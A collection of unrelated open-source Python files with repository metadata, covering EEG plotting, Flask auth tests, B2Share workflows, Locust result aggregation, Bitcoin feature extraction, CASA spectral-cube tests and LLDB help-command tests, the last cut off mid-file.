def animate_signals(nb_signals, incre, fs=256, refresh_rate=30., anim_dur=10., figsize=(12,8)):
"""
Draw and update a figure in real-time representing the summation of many
sine waves, to explain the concept of Fourier decomposition.
INPUTS
nb_signals : number of signals to sum together
incre : increment, in Hz, between each of the signals
fs : sampling frequency
refresh_rate : refresh rate of the animation
anim_dur : approximate duration of the animation, in seconds
"""
# Initialize values that remain constant throughout the animation
A = 1
t = np.linspace(0, 2, fs)
offsets = np.arange(nb_signals+1).reshape((nb_signals+1,1))*(A*(nb_signals+1))
freqs = np.arange(nb_signals)*incre
# Initialize the figure
fig, ax = plt.subplots(figsize=figsize)
ax.hold(True)
plt.xlabel('Time')
ax.yaxis.set_ticks(offsets)
ax.set_yticklabels([str(f)+' Hz' for f in freqs] + ['Sum'])
ax.xaxis.set_ticks([])
# Initialize the Line2D elements for each signal
sines = np.array([sinewave(A, f, 0, t) for f in freqs])
sines = np.vstack((sines, np.sum(sines, axis=0))) + offsets
points = [ax.plot(t, x)[0] for x in sines]
# Animation refresh loop
for i in np.arange(anim_dur*refresh_rate):
# Update time
t = np.linspace(0, 2, fs) + i*fs/refresh_rate
# Update signals
sines = np.array([sinewave(A, f, 0, t) for f in freqs])
sines = np.vstack((sines, np.sum(sines, axis=0))) + offsets
# Update figure
for p, x in zip(points, sines):
p.set_ydata(x)
# Wait before starting another cycle
plt.pause(1./refresh_rate)
if __name__ == '__main__':
# 1) DISTRIBUTION OF TRAINING DATA
# Generate fake data
nb_points = 10*10
relax_data = np.random.normal(0.01, 0.01, size=(nb_points,))
focus_data = np.random.normal(0.03, 0.01, size=(nb_points,))
dot_plot(x=np.concatenate((relax_data, focus_data)),
labels=np.concatenate((np.zeros((nb_points,)), np.ones((nb_points,)))),
step=4)
# 2) PSD PLOT
# Generate fake data
f = np.arange(0, 110, 1) # one-second windows = 1-Hz bins
psd = 10*np.log10(1./f)
psd_with_bands_plot(f, psd)
# 3) FOURIER DECOMPOSITION ANIMATION
animate_signals(4, 2) | NeuroTechX/eeg-101 | python_tools/utilities.py | Python | isc | 5,241 |
# -*- coding: utf-8 -*-
"""
tests.test_functionality
{{ "~" * "tests.test_functionality"|count }}
Test basic login and registration functionality
:author: {{ cookiecutter.author }}
:copyright: © {{ cookiecutter.copyright }}
:license: {{ cookiecutter.license }}, see LICENSE for more details.
templated from https://github.com/ryanolson/cookiecutter-webapp
"""
import pytest
from flask import url_for
from flask.ext.security.utils import verify_password
from {{cookiecutter.app_name}}.models.users import User
from .factories import UserFactory
@pytest.fixture
def user(db):
return UserFactory(password='myprecious')
class TestLoggingIn:
def test_jwt_log_in_returns_200_with_token(self, user, testapp):
data = dict(username=user.email, password='myprecious')
res = testapp.post_json('/auth', data)
assert res.status_code == 200
assert 'token' in res.json
def test_log_in_returns_200_with_email_on_page(self, user, testapp):
# Goes to homepage
res = testapp.get("/")
# Clicks Login link
res = res.click("Login")
# Fills out login form
form = res.forms['login_form']
form['email'] = user.email
form['password'] = 'myprecious'
# Submits
res = form.submit().follow()
assert res.status_code == 200
assert user.email in res
def test_sees_login_link_on_log_out(self, user, testapp):
res = testapp.get("/login")
# Fills out login form on the login page
form = res.forms['login_form']
form['email'] = user.email
form['password'] = 'myprecious'
# Submits
res = form.submit().follow()
res = testapp.get(url_for('security.logout')).follow()
# sees login link
assert url_for('security.login') in res
def test_sees_error_message_if_password_is_incorrect(self, user, testapp):
# Goes to homepage
res = testapp.get("/login")
# Fills out login form, password incorrect
form = res.forms['login_form']
form['email'] = user.email
form['password'] = 'wrong'
# Submits
res = form.submit()
# sees error
assert "Invalid password" in res
def test_sees_error_message_if_username_doesnt_exist(self, user, testapp):
# Goes to homepage
res = testapp.get("/login")
# Fills out login form with an unknown email
form = res.forms['login_form']
form['email'] = 'unknown'
form['password'] = 'myprecious'
# Submits
res = form.submit()
# sees error
assert "user does not exist" in res
def test_auth_jwt_token_succeeds_with_logged_in_user_and_json_post(self, user, testapp):
self.test_log_in_returns_200_with_email_on_page(user, testapp)
resp = testapp.post_json("/auth/jwt/token", {})
assert resp.status_code == 200
assert 'token' in resp.json
def test_auth_jwt_token_fails_with_logged_in_user_and_non_json_post(self, user, testapp):
self.test_log_in_returns_200_with_email_on_page(user, testapp)
resp = testapp.post("/auth/jwt/token", {}, expect_errors=True)
assert resp.status_code == 415
def test_auth_jwt_token_fails_without_logged_in_user(self, user, testapp):
resp = testapp.post_json("/auth/jwt/token", {}, expect_errors=True)
assert resp.status_code == 401
class TestRegistering:
def test_can_register(self, user, testapp):
old_count = len(User.all())
# Goes to homepage
res = testapp.get("/")
# Clicks Create Account button
res = res.click("Login")
res = res.click("register")
# Fills out the form
form = res.forms["register_form"]
form['email'] = 'foo@bar.com'
form['password'] = 'secret'
form['password_confirm'] = 'secret'
# Submits
res = form.submit().follow()
assert res.status_code == 200
# A new user was created
assert len(User.all()) == old_count + 1
def test_sees_error_message_if_the_password_is_too_short(self, user, testapp):
# Goes to registration page
res = testapp.get(url_for("security.register"))
# Fills out registration form, but password is too short
form = res.forms["register_form"]
form['email'] = 'foo@bar.com'
form['password'] = 'short'
form['password_confirm'] = 'short'
# Submits
res = form.submit()
# sees error
assert "Password must be at least 6 characters" in res
def test_sees_error_message_if_passwords_dont_match(self, user, testapp):
# Goes to registration page
res = testapp.get(url_for("security.register"))
# Fills out form, but passwords don't match
form = res.forms["register_form"]
form['email'] = 'foobar'
form['email'] = 'foo@bar.com'
form['password'] = 'secret'
form['password_confirm'] = 'secrets'
# Submits
res = form.submit()
# sees error message
assert "Passwords do not match" in res
def test_sees_error_message_if_user_already_registered(self, user, testapp):
user = UserFactory(active=True) # A registered user
user.save()
# Goes to registration page
res = testapp.get(url_for("security.register"))
# Fills out form, but username is already registered
form = res.forms["register_form"]
form['email'] = user.email
form['password'] = 'secret'
form['password_confirm'] = 'secret'
# Submits
res = form.submit()
# sees error
assert "is already associated with an account" in res
| ryanolson/cookiecutter-webapp | {{cookiecutter.app_name}}/tests/test_functionality.py | Python | mit | 5,755 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License
#
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import unittest
from qpid_dispatch.management.entity import EntityBase, camelcase
class EntityTest(unittest.TestCase):
def test_camelcase(self):
self.assertEqual('', camelcase(''))
self.assertEqual('foo', camelcase('foo'))
self.assertEqual('Foo', camelcase('foo', capital=True))
self.assertEqual('fooBar', camelcase('foo bar'))
self.assertEqual('fooBar', camelcase('foo.bar'))
self.assertEqual('fooBar', camelcase('foo-bar'))
self.assertEqual('fooBar', camelcase('foo_bar'))
self.assertEqual('fooBarBaz', camelcase('foo_bar.baz'))
self.assertEqual('FooBarBaz', camelcase('foo_bar.baz', capital=True))
self.assertEqual('fooBar', camelcase('fooBar'))
self.assertEqual('FooBar', camelcase('fooBar', capital=True))
def test_entity(self):
e = EntityBase({'fooBar': 'baz'}, type='container', name='x')
self.assertEqual(e.attributes, {'type': 'container', 'name': 'x', 'fooBar': 'baz'})
self.assertEqual(e.name, 'x')
self.assertEqual(e['name'], 'x')
e.name = 'y'
self.assertEqual(e.name, 'y')
self.assertEqual(e['name'], 'y')
self.assertEqual(e.attributes['name'], 'y')
e.xx = 'xx'
self.assertEqual(e.xx, 'xx')
self.assertEqual(e['xx'], 'xx')
self.assertEqual(e.attributes['xx'], 'xx')
if __name__ == '__main__':
unittest.main()
| ganeshmurthy/qpid-dispatch | tests/management/entity.py | Python | apache-2.0 | 2,365 |
# -*- coding: utf-8 -*-
#
# This file is part of EUDAT B2Share.
# Copyright (C) 2015, 2016, University of Tuebingen, CERN.
#
# B2Share is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# B2Share is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with B2Share; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Publication workflows."""
from .errors import InvalidPublicationStateError
def review_and_publish_workflow(previous_model, new_deposit):
"""Workflow publishing the deposits on submission."""
# import ipdb
# ipdb.set_trace()
from b2share.modules.deposit.api import PublicationStates
new_state = new_deposit['publication_state']
previous_state = previous_model.json['publication_state']
if previous_state != new_state:
transition = (previous_state, new_state)
# Check that the transition is a valid one
if transition not in [
(PublicationStates.draft.name, PublicationStates.submitted.name),
(PublicationStates.submitted.name, PublicationStates.draft.name),
(PublicationStates.submitted.name,
PublicationStates.published.name),
]:
raise InvalidPublicationStateError(
description='Transition from publication state {0} to {1} is'
'not allowed by community\'s workflow {2}'.format(
previous_state, new_state, 'review_and_publish'
)
)
def direct_publish_workflow(previous_model, new_deposit):
"""Workflow publishing the deposits on submission."""
from b2share.modules.deposit.api import PublicationStates
new_state = new_deposit['publication_state']
previous_state = previous_model.json['publication_state']
if previous_state != new_state:
transition = (previous_state, new_state)
# Check that the transition is a valid one
if transition not in [
(PublicationStates.draft.name, PublicationStates.submitted.name),
(PublicationStates.draft.name, PublicationStates.published.name),
]:
raise InvalidPublicationStateError(
description='Transition from publication state {0} to {1} is '
'not allowed by community\'s workflow {2}'.format(
previous_state, new_state, 'direct_publish'
)
)
# Publish automatically when submitted
if new_state == PublicationStates.submitted.name:
new_deposit['publication_state'] = PublicationStates.published.name
publication_workflows = {
'review_and_publish': review_and_publish_workflow,
'direct_publish': direct_publish_workflow,
}
| SarahBA/b2share | b2share/modules/communities/workflows.py | Python | gpl-2.0 | 3,365 |
'''
Created on Jan 8, 2015
@author: ubuntu
'''
putCablingPlan = []
putDeviceConfiguration = []
getDevices = []
getIpFabric = []
def main():
outFile = open("out.csv","w") # open file for appending
with open ("locust.csv", "r") as locust:
for line in locust:
if 'cabling-plan' in line:
putCablingPlan.append(line)
elif 'device-configuration' in line:
putDeviceConfiguration.append(line)
elif 'devices' in line:
getDevices.append(line)
elif 'GET' in line and 'ip-fabrics/' in line and 'devices' not in line:
getIpFabric.append(line)
elif 'None' in line and 'Total' in line:
lastLine = line
else:
outFile.write(line)
outFile.write(aggregate(putCablingPlan))
outFile.write(aggregate(putDeviceConfiguration))
outFile.write(aggregate(getDevices))
outFile.write(aggregate(getIpFabric))
outFile.write('\n')
outFile.write(lastLine)
outFile.close()
def aggregate(requests):
#"Method","Name","# requests","# failures","Median response time","Average response time","Min response time","Max response time","Average Content Size","Requests/s"
#"PUT","/openclos/ip-fabrics/000a63e2-2f3c-4c62-a09c-989902c35022/cabling-plan",4,0,520,563,503,687,0,0.03
noOfRequest = 0
failure = 0
median = 0
average = 0
mins = []
maxs = []
contentSize = 0
reqPerSec = 0.0
params = []
for request in requests:
params = request.split(',')
noOfRequest += int(params[2])
failure += int(params[3])
median += int(params[4])
average += int(params[5])
mins.append(int(params[6]))
maxs.append(int(params[7]))
contentSize += int(params[8])
reqPerSec += float(params[9])
rowCount = len(requests)
nameSplit = params[1].split('/')
nameSplit[3] = '<fabric id>'
if len(nameSplit) == 4:
nameSplit[3] += '"'
out = [params[0], '/'.join(nameSplit), str(noOfRequest), str(failure), str(int(median/rowCount)), str(int(average/rowCount)),
str(min(mins)), str(max(maxs)), str(int(contentSize)), str(round(reqPerSec/rowCount, 2))+'\n']
return ','.join(out)
if __name__ == '__main__':
main()
| plucena24/OpenClos | jnpr/openclos/tests/performance/postProcess.py | Python | apache-2.0 | 2,361 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os.path
import configparser
import pandas as pd
from tqdm import tqdm
from tsfresh.utilities.dataframe_functions import impute
from tsfresh.feature_extraction import feature_calculators
def main():
if len(sys.argv) < 2:
print('Usage: ./extract_best_features.py datafile.csv')
exit(1)
load_params()
if not os.path.isfile('timeseries.csv') or not os.path.isfile('labels.csv'):
filename = sys.argv[1]
raw_price_data = pd.read_csv(filename, index_col=None, header=0, thousands=',')
timeseries, labels = convert(raw_price_data)
timeseries.to_csv('timeseries.csv', index=False, header=True)
labels.reset_index(drop=True, inplace=True)
labels.to_csv('labels.csv', sep=',', index=False, header=False)
else:
print('Intermediate files exist...')
timeseries = pd.read_csv('timeseries.csv', index_col=None, header=0)
# timeseries = pd.read_csv('short_timeseries.csv', index_col=None, header=0)
features = extract_best_features(timeseries, samples_per_window=LOOKBACK_MINUTES)
impute(features)
features.reset_index(drop=True, inplace=True)
features.to_csv('features_extracted.csv', sep=',', index=False, header=True)
def extract_best_features(timeseries, samples_per_window):
'''
By RFE
'''
extracted_features = pd.DataFrame()
start = 0
end = samples_per_window
col_feature1 = []
col_feature2 = []
col_feature3 = []
col_feature4 = []
col_feature5 = []
col_feature6 = []
col_feature7 = []
col_feature8 = []
for i in tqdm(range(len(timeseries) // samples_per_window)):
window = timeseries[start:end]['Open'].as_matrix().tolist()
col_feature1.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 10, 'attr': 'imag'}]))[0][1])
col_feature2.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 14, 'attr': 'imag'}]))[0][1])
col_feature3.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 2, 'attr': 'abs'}]))[0][1])
col_feature4.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 3, 'attr': 'real'}]))[0][1])
col_feature5.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 4, 'attr': 'real'}]))[0][1])
col_feature6.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 6, 'attr': 'imag'}]))[0][1])
col_feature7.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 7, 'attr': 'imag'}]))[0][1])
col_feature8.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 8, 'attr': 'real'}]))[0][1])
start = end
end += samples_per_window
extracted_features['Open_feature1'] = col_feature1
extracted_features['Open_feature2'] = col_feature2
extracted_features['Open_feature3'] = col_feature3
extracted_features['Open_feature4'] = col_feature4
extracted_features['Open_feature5'] = col_feature5
extracted_features['Open_feature6'] = col_feature6
extracted_features['Open_feature7'] = col_feature7
extracted_features['Open_feature8'] = col_feature8
return extracted_features
# 'Volume_(Currency)__fft_coefficient__coeff_10__attr_"imag"'
# 'Volume_(Currency)__fft_coefficient__coeff_14__attr_"imag"'
# 'Volume_(Currency)__fft_coefficient__coeff_2__attr_"abs"'
# 'Volume_(Currency)__fft_coefficient__coeff_3__attr_"real"'
# 'Volume_(Currency)__fft_coefficient__coeff_4__attr_"real"'
# 'Volume_(Currency)__fft_coefficient__coeff_6__attr_"imag"'
# 'Volume_(Currency)__fft_coefficient__coeff_7__attr_"imag"'
# 'Volume_(Currency)__fft_coefficient__coeff_8__attr_"real"'
def convert(raw_price_data, percentage=False):
price_data = raw_price_data.astype(float)
print('Generating labels...')
close_prices = price_data['Close'].reset_index(drop=True)
open_prices = price_data['Open'].reset_index(drop=True)
labels = pd.Series([0] * len(price_data))
for i in tqdm(range(len(price_data) - 1, minutes_before - 1, -1)):
if close_prices[i] > open_prices[i]:
labels[i] = 1
else:
labels[i] = 0
labels = labels.reset_index(drop=True)[minutes_before:]
print('Removing redundent columns...')
for col in price_data.columns:
if 'high' in col.lower() or 'low' in col.lower() or 'close' in col.lower():
price_data.drop(col, axis=1, inplace=True)
print('Converting into timeseries...')
raw = []
for i in tqdm(range(minutes_before, len(price_data))):
for j in range(minutes_before):
row = price_data.loc[i - minutes_before + j].tolist()
raw.append([i - minutes_before, j] + row)
timeseries = pd.DataFrame(raw, index=None, columns=['id', 'time'] + price_data.columns.tolist())
return timeseries, labels
def load_params():
config = configparser.ConfigParser()
config.read('../config.ini')
global LOOKBACK_MINUTES
LOOKBACK_MINUTES = int(config['Classifiers']['lookback'])
if __name__ == '__main__':
main() | TPeterW/Bitcoin-Price-Prediction | feature_extraction/extract_best_features.py | Python | mit | 4,773 |
from __future__ import print_function, absolute_import, division
import os
import shutil
from itertools import product
import pytest
import numpy as np
from numpy.testing import assert_allclose
from astropy.tests.helper import assert_quantity_allclose
from astropy import units as u
from casa_formats_io import coordsys_to_astropy_wcs
from ..io.casa_masks import make_casa_mask
from .. import StokesSpectralCube, BooleanArrayMask
from .. import SpectralCube, VaryingResolutionSpectralCube
try:
import casatools
from casatools import image
CASA_INSTALLED = True
except ImportError:
try:
from taskinit import ia as image
CASA_INSTALLED = True
except ImportError:
CASA_INSTALLED = False
DATA = os.path.join(os.path.dirname(__file__), 'data')
def make_casa_testimage(infile, outname):
infile = str(infile)
outname = str(outname)
if not CASA_INSTALLED:
raise Exception("Attempted to make a CASA test image in a non-CASA "
"environment")
ia = image()
ia.fromfits(infile=infile, outfile=outname, overwrite=True)
ia.unlock()
ia.close()
ia.done()
cube = SpectralCube.read(infile)
if isinstance(cube, VaryingResolutionSpectralCube):
ia.open(outname)
# populate restoring beam emptily
ia.setrestoringbeam(major={'value':1.0, 'unit':'arcsec'},
minor={'value':1.0, 'unit':'arcsec'},
pa={'value':90.0, 'unit':'deg'},
channel=len(cube.beams)-1,
polarization=-1,
)
# populate each beam (hard assumption of 1 poln)
for channum, beam in enumerate(cube.beams):
casabdict = {'major': {'value':beam.major.to(u.deg).value, 'unit':'deg'},
'minor': {'value':beam.minor.to(u.deg).value, 'unit':'deg'},
'positionangle': {'value':beam.pa.to(u.deg).value, 'unit':'deg'}
}
ia.setrestoringbeam(beam=casabdict, channel=channum, polarization=0)
ia.unlock()
ia.close()
ia.done()
@pytest.fixture
def filename(request):
return request.getfixturevalue(request.param)
@pytest.mark.parametrize(('memmap', 'bigendian'), product((False, True), (False, True)))
def test_casa_read_basic(memmap, bigendian):
# Check that SpectralCube.read works for an example CASA dataset stored
# in the tests directory. This test should NOT require CASA, whereas a
# number of tests below require CASA to generate test datasets. The present
# test is to ensure CASA is not required for reading.
if bigendian:
cube = SpectralCube.read(os.path.join(DATA, 'basic_bigendian.image'), memmap=memmap)
else:
cube = SpectralCube.read(os.path.join(DATA, 'basic.image'), memmap=memmap)
assert cube.shape == (3, 4, 5)
assert_allclose(cube.wcs.pixel_to_world_values(1, 2, 3),
[2.406271e+01, 2.993521e+01, 1.421911e+09])
# Carry out an operation to make sure the underlying data array works
cube.moment0()
# Slice the dataset
assert_quantity_allclose(cube.unmasked_data[0, 0, :],
[1, 1, 1, 1, 1] * u.Jy / u.beam)
assert_quantity_allclose(cube.unmasked_data[0, 1, 2], 1 * u.Jy / u.beam)
def test_casa_read_basic_nodask():
# For CASA datasets, the default when reading cubes is use_dask=True.
# Here we check that setting use_dask=False explicitly raises an error.
with pytest.raises(ValueError, match='Loading CASA datasets is not possible with use_dask=False'):
SpectralCube.read(os.path.join(DATA, 'basic.image'), use_dask=False)
def test_casa_read_basic_nomask():
# Make sure things work well if there is no mask in the data
cube = SpectralCube.read(os.path.join(DATA, 'nomask.image'))
assert cube.shape == (3, 4, 5)
assert_allclose(cube.wcs.pixel_to_world_values(1, 2, 3),
[2.406271e+01, 2.993521e+01, 1.421911e+09])
# Carry out an operation to make sure the underlying data array works
cube.moment0()
# Slice the dataset
assert_quantity_allclose(cube.unmasked_data[0, 0, :],
[1, 1, 1, 1, 1] * u.Jy / u.beam)
assert_quantity_allclose(cube.unmasked_data[0, 1, 2], 1 * u.Jy / u.beam)
# Slice the cube
assert_quantity_allclose(cube[:, 0, 0],
[1, 1, 1] * u.Jy / u.beam)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
@pytest.mark.parametrize('filename', ('data_adv', 'data_advs', 'data_sdav',
'data_vad', 'data_vsad'),
indirect=['filename'])
def test_casa_read(filename, tmp_path):
# Check that SpectralCube.read returns data with the same shape and values
# if read from CASA as if read from FITS.
cube = SpectralCube.read(filename)
make_casa_testimage(filename, tmp_path / 'casa.image')
casacube = SpectralCube.read(tmp_path / 'casa.image')
assert casacube.shape == cube.shape
assert_allclose(casacube.unmasked_data[:].value,
cube.unmasked_data[:].value)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
@pytest.mark.parametrize('filename', ('data_adv', 'data_advs', 'data_sdav',
'data_vad', 'data_vsad'),
indirect=['filename'])
def test_casa_read_nomask(filename, tmp_path):
# As for test_casa_read, but we remove the mask to make sure
# that we can still read in the cubes
cube = SpectralCube.read(filename)
make_casa_testimage(filename, tmp_path / 'casa.image')
shutil.rmtree(tmp_path / 'casa.image' / 'mask0')
casacube = SpectralCube.read(tmp_path / 'casa.image')
assert casacube.shape == cube.shape
assert_allclose(casacube.unmasked_data[:].value,
cube.unmasked_data[:].value)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
def test_casa_read_stokes(data_advs, tmp_path):
# Check that StokesSpectralCube.read returns data with the same shape and values
# if read from CASA as if read from FITS.
cube = StokesSpectralCube.read(data_advs)
make_casa_testimage(data_advs, tmp_path / 'casa.image')
casacube = StokesSpectralCube.read(tmp_path / 'casa.image')
assert casacube.I.shape == cube.I.shape
assert_allclose(casacube.I.unmasked_data[:].value,
cube.I.unmasked_data[:].value)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
def test_casa_mask(data_adv, tmp_path):
# This tests the make_casa_mask function which can be used to create a mask
# file in an existing image.
cube = SpectralCube.read(data_adv)
mask_array = np.array([[True, False], [False, False], [True, True]])
bool_mask = BooleanArrayMask(mask=mask_array, wcs=cube._wcs,
shape=cube.shape)
cube = cube.with_mask(bool_mask)
make_casa_mask(cube, str(tmp_path / 'casa.mask'), add_stokes=False,
append_to_image=False, overwrite=True)
ia = casatools.image()
ia.open(str(tmp_path / 'casa.mask'))
casa_mask = ia.getchunk()
coords = ia.coordsys()
ia.unlock()
ia.close()
ia.done()
# Test masks
# Mask array is broadcasted to the cube shape. Mimic this, switch to ints,
# and transpose to match CASA image.
compare_mask = np.tile(mask_array, (4, 1, 1)).astype('int16').T
assert np.all(compare_mask == casa_mask)
# Test WCS info
# Convert back to an astropy wcs object so transforms are dealt with.
casa_wcs = coordsys_to_astropy_wcs(coords.torecord())
header = casa_wcs.to_header() # Invokes transform
# Compare some basic properties EXCLUDING the spectral axis
assert_allclose(cube.wcs.wcs.crval[:2], casa_wcs.wcs.crval[:2])
assert_allclose(cube.wcs.wcs.cdelt[:2], casa_wcs.wcs.cdelt[:2])
assert np.all(list(cube.wcs.wcs.cunit)[:2] == list(casa_wcs.wcs.cunit)[:2])
assert np.all(list(cube.wcs.wcs.ctype)[:2] == list(casa_wcs.wcs.ctype)[:2])
assert_allclose(cube.wcs.wcs.crpix, casa_wcs.wcs.crpix)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
def test_casa_mask_append(data_adv, tmp_path):
# This tests the append option for the make_casa_mask function
cube = SpectralCube.read(data_adv)
mask_array = np.array([[True, False], [False, False], [True, True]])
bool_mask = BooleanArrayMask(mask=mask_array, wcs=cube._wcs,
shape=cube.shape)
cube = cube.with_mask(bool_mask)
make_casa_testimage(data_adv, tmp_path / 'casa.image')
# in this case, casa.mask is the name of the mask, not its path
make_casa_mask(cube, 'casa.mask', append_to_image=True,
img=str(tmp_path / 'casa.image'), add_stokes=False, overwrite=True)
assert os.path.exists(tmp_path / 'casa.image/casa.mask')
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
def test_casa_beams(data_adv, data_adv_beams, tmp_path):
# Test both make_casa_testimage and the beam reading tools using casa's
# image reader
make_casa_testimage(data_adv, tmp_path / 'casa_adv.image')
make_casa_testimage(data_adv_beams, tmp_path / 'casa_adv_beams.image')
cube = SpectralCube.read(tmp_path / 'casa_adv.image', format='casa_image')
assert hasattr(cube, 'beam')
cube_beams = SpectralCube.read(tmp_path / 'casa_adv_beams.image', format='casa_image')
assert hasattr(cube_beams, 'beams')
assert isinstance(cube_beams, VaryingResolutionSpectralCube)
| radio-astro-tools/spectral-cube | spectral_cube/tests/test_casafuncs.py | Python | bsd-3-clause | 9,896 |
"""
Test some lldb help commands.
See also CommandInterpreter::OutputFormattedHelpText().
"""
from __future__ import print_function
import os
import time
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class HelpCommandTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
@no_debug_info_test
def test_simplehelp(self):
"""A simple test of 'help' command and its output."""
self.expect("help",
startstr='Debugger commands:')
self.expect("help -a", matching=False,
substrs=['next'])
self.expect("help", matching=True,
substrs=['next'])
@no_debug_info_test
def test_help_on_help(self):
"""Testing the help on the help facility."""
self.expect("help help", matching=True,
substrs=['--hide-aliases',
'--hide-user-commands'])
@no_debug_info_test
def version_number_string(self):
"""Helper function to find the version number string of lldb."""
plist = os.path.join(
os.environ["LLDB_SRC"],
"resources",
"LLDB-Info.plist")
try:
CFBundleVersionSegFound = False
with open(plist, 'r') as f:
for line in f:
if CFBundleVersionSegFound:
version_line = line.strip()
import re
m = re.match("<string>(.*)</string>", version_line)
if m:
version = m.group(1)
return version
else:
# Unsuccessful, let's juts break out of the for
# loop.
break
if line.find("<key>CFBundleVersion</key>") != -1:
# Found our match. The next line contains our version
# string, for example:
#
# <string>38</string>
CFBundleVersionSegFound = True
except:
# Just fallthrough...
import traceback
traceback.print_exc()
pass
# Use None to signify that we are not able to grok the version number.
return None
@no_debug_info_test
def test_help_arch(self):
"""Test 'help arch' which should list of supported architectures."""
self.expect("help arch",
substrs=['arm', 'x86_64', 'i386'])
@no_debug_info_test
def test_help_version(self):
"""Test 'help version' and 'version' commands."""
self.expect("help version",
substrs=['Show the LLDB debugger version.'])
import re
version_str = self.version_number_string()
match = re.match('[0-9]+', version_str)
search_regexp = ['lldb( version|-' + (version_str if match else '[0-9]+') + ').*\n']
self.expect("version",
patterns=search_regexp)
@no_debug_info_test
def test_help_should_not_crash_lldb(self):
"""Command 'help disasm' should not crash lldb."""
self.runCmd("help disasm", check=False)
self.runCmd("help unsigned-integer")
@no_debug_info_test
def test_help_should_not_hang_emacsshell(self):
"""Command 'settings set term-width 0' should not hang the help command."""
self.expect(
"settings set term-width 0",
COMMAND_FAILED_AS_EXPECTED,
error=True,
substrs=['error: 0 is out of range, valid values must be between'])
# self.runCmd("settings set term-width 0")
self.expect("help",
startstr='Debugger commands:')
@no_debug_info_test
def test_help_breakpoint_set(self):
"""Test that 'help breakpoint set' does not print out redundant lines of:
'breakpoint set [-s <shlib-name>] ...'."""
self.expect("help breakpoint set", matching=False,
substrs=['breakpoint set [-s <shlib-name>]'])
@no_debug_info_test
def test_help_image_dump_symtab_should_not_crash(self):
"""Command 'help image dump symtab' should not crash lldb."""
# 'image' is an alias for 'target modules'.
self.expect("help image dump symtab",
substrs=['dump symtab',
'sort-order'])
@no_debug_info_test
def test_help_image_du_sym_is_ambiguous(self):
"""Command 'help image du sym' is ambiguous and spits out the list of candidates."""
self.expect("help image du sym",
COMMAND_FAILED_AS_EXPECTED, error=True,
substrs=['error: ambiguous command image du sym',
'symfile',
'symtab'])
@no_debug_info_test
def test_help_image_du_line_should_work(self):
"""Command 'help image du line-table' is not ambiguous and should work."""
# 'image' is an alias for 'target modules'.
self.expect("help image du line", substrs=[
'Dump the line table for one or more compilation units'])
@no_debug_info_test
def test_help_target_variable_syntax(self):
"""Command 'help target variable' should display <variable-name> ..."""
self.expect("help target variable",
substrs=['<variable-name> [<variable-name> [...]]'])
@no_debug_info_test
def test_help_watchpoint_and_its_args(self):
"""Command 'help watchpoint', 'help watchpt-id', and 'help watchpt-id-list' should work."""
self.expect("help watchpoint",
substrs=['delete', 'disable', 'enable', 'list'])
self.expect("help watchpt-id",
substrs=['<watchpt-id>'])
self.expect("help watchpt-id-list",
substrs=['<watchpt-id-list>'])
@no_debug_info_test
def test_help_watchpoint_set(self):
"""Test that 'help watchpoint set' prints out 'expression' and 'variable'
as the possible subcommands."""
self.expect("help watchpoint set",
substrs=['The following subcommands are supported:'],
patterns=['expression +--',
'variable +--'])
@no_debug_info_test
def test_help_po_hides_options(self):
"""Test that 'help po' does not show all the options for expression"""
self.expect(
"help po",
substrs=[
'--show-all-children',
'--object-description'],
matching=False)
@no_debug_info_test
def test_help_run_hides_options(self):
"""Test that 'help run' does not show all the options for process launch"""
self.expect("help run",
substrs=['--arch', '--environment'], matching=False)
@no_debug_info_test
def test_help_next_shows_options(self):
"""Test that 'help next' shows all the options for thread step-over"""
self.expect("help next",
substrs=['--python-class', '--run-mode'], matching=True)
@no_debug_info_test
def test_help_provides_alternatives(self):
"""Test that help on commands that don't exist provides information on additional help avenues"""
self.expect(
"help thisisnotadebuggercommand",
substrs=[
"'thisisnotadebuggercommand' is not a known command.",
"Try 'help' to see a current list of commands.",
"Try 'apropos thisisnotadebuggercommand' for a list of related commands.",
"Try 'type lookup thisisnotadebuggercommand' for information on types, methods, functions, modules, etc."],
error=True)
self.expect(
"help process thisisnotadebuggercommand",
substrs=[
"'process thisisnotadebuggercommand' is not a known command.",
"Try 'help' to see a current list of commands.",
"Try 'apropos thisisnotadebuggercommand' for a list of related commands.",
